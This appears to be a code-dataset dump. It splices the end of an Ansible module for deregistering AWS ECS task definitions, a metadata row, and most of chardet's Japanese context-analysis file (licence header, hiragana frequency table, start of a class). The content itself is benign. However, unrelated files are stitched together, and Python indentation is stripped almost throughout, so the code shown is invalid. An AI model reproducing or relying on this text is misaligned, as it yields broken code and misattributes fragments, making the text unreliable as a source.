module.fail_json(msg="To use task definitions, an arn or family and revision must be specified")
existing = task_mgr.describe_task(task_to_describe)
if not existing:
pass
else:
# It exists, so we should delete it and mark changed. Return info about the task definition deleted
results['taskdefinition'] = existing
if 'status' in existing and existing['status'] == "INACTIVE":
results['changed'] = False
else:
if not module.check_mode:
task_mgr.deregister_task(task_to_describe)
results['changed'] = True
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
swarna-k/MyDiary | flask/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/jpcntx.py | 1777 | 19348 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .compat import wrap_ord
NUM_OF_CATEGORY = 6
DONT_KNOW = -1
ENOUGH_REL_THRESHOLD = 100
MAX_REL_THRESHOLD = 1000
MINIMUM_DATA_THRESHOLD = 4
# This is the hiragana 2-char sequence table; the number in each cell represents its frequency category
jp2CharContext = (
(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),
(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),
(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),
(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4),
(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4),
(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3),
(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3),
(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3),
(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4),
(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3),
(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4),
(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3),
(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5),
(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3),
(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5),
(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4),
(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4),
(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3),
(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3),
(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3),
(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5),
(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4),
(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5),
(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3),
(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4),
(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4),
(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4),
(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1),
(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0),
(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3),
(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0),
(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3),
(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3),
(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5),
(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4),
(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5),
(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3),
(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3),
(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3),
(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3),
(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4),
(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4),
(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2),
(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3),
(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3),
(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3),
(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3),
(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4),
(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3),
(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4),
(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3),
(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3),
(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4),
(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4),
(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3),
(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4),
(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4),
(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3),
(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4),
(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4),
(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4),
(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3),
(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2),
(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2),
(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3),
(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3),
(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5),
(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3),
(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4),
(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4),
(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1),
(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2),
(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3),
(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1),
)
class JapaneseContextAnalysis:
def __init__(self):
self.reset()
def reset(self):
self._mTotalRel = 0 # total sequence received
        # category counters, each integer counts sequences in its category
self._mRelSample = [0] * NUM_OF_CATEGORY
# if last byte in current buffer is not the last byte of a character,
# we need to know how many bytes to skip in next buffer
self._mNeedToSkipCharNum = 0
self._mLastCharOrder = -1 # The order of previous char
